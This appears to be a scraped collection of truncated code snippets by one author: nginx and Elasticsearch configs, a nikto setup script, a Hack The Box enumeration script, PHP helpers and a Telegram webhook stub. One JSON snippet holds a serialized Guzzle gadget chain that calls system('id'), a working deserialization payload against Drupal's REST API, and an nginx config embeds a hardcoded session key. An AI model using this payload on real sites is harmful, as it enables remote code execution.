theMiddleBlue

# Configuration
# --------------

# Comment the following line if you are not behind a proxy_pass or load balancer
set $dnsbl_clientip $remote_addr;

# Uncomment if the client IP is on X-Forwarded-For
#set $dnsbl_clientip $http_x_forwarded_for;

# Uncomment if you are using CloudFlare

theMiddleBlue

#!/bin/bash

git clone https://github.com/sullo/nikto.git;
cat nikto/program/nikto.conf | grep -v 'USERAGENT\=' > nikto/program/nikto.conf.new;
echo -en '\nUSERAGENT=Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36' >> nikto/program/nikto.conf.new;
mv -f nikto/program/nikto.conf.new nikto/program/nikto.conf;

perl nikto/program/nikto.pl -Help

exit 0

theMiddleBlue

#!/usr/bin/env python

# ---------------- CONFIG ------------------

username = "your@secthemall username here"
apikey = "your API Key here"
size = "1000"
sleep_sec = 60
nginx_reload_cmd = "service nginx reload"

theMiddleBlue

<html>
<body>

<?php
	function sanitize_username($username) {
		return strtr(
			htmlentities($username, ENT_QUOTES),
			[';' => '']
		);
	}

theMiddleBlue

version: '2.2'
services:
  es01:
    image: docker.elastic.co/elasticsearch/elasticsearch:6.5.0
    container_name: elastic
    environment:
      - node.name=elastic
      - cluster.name=es-docker-cluster
      - discovery.type=single-node
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"

theMiddleBlue

#!/bin/bash

# Usage: ./htb-node-enumerate.sh r

chars='qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM$'

function getchar() {
	for (( i=0; i<${#chars}; i++ )); do

		if [ -z $2 ]; then

theMiddleBlue

server {
   listen       80;
   server_name  example.com;

   encrypted_session_key 'v1-clG~!~v7B_Z0yu.:iw*Rj#l-Nc8E^';
   encrypted_session_iv "themiddlerfvbgt5";
   encrypted_session_expires 20;

   location ~ /botbuster.js {
      default_type 'text/javascript';

theMiddleBlue

{
  "link": [
    {
      "value": "link",
      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
    }
  ],
  "_links": {
    "type": {
      "href": "http://localhost/rest/type/shortcut/default"

theMiddleBlue

<?php

	if(isset($_POST['photo'])) {
		// echo $_POST['photo'];

		file_put_contents('/usr/local/openresty/nginx/html/test.jpg', base64_decode($_POST['photo']));

		exec("curl -s -X POST -F 'file=@/usr/local/openresty/nginx/html/test.jpg' http://192.168.1.4:8080/facebox/check", $a);

		echo(implode('', $a));

theMiddleBlue

<?php
  if(!preg_match('/^149\.154\.167\.(19[7-9]|20[0-9]|21[0-9]|22[0-9]|23[0-3])$/', $_SERVER['REMOTE_ADDR'])) {
    die('IP Address not allowed.');
  }

  if($_SERVER['REQUEST_METHOD'] != 'POST') {
    die('Request method not allowed.');
  }

  $token = '<bot token here>';